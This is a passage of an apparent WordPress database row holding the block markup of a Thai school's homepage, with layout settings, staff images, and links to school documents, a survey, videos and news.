(687,1,'2025-07-15 14:41:39','2025-07-15 07:41:39','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" 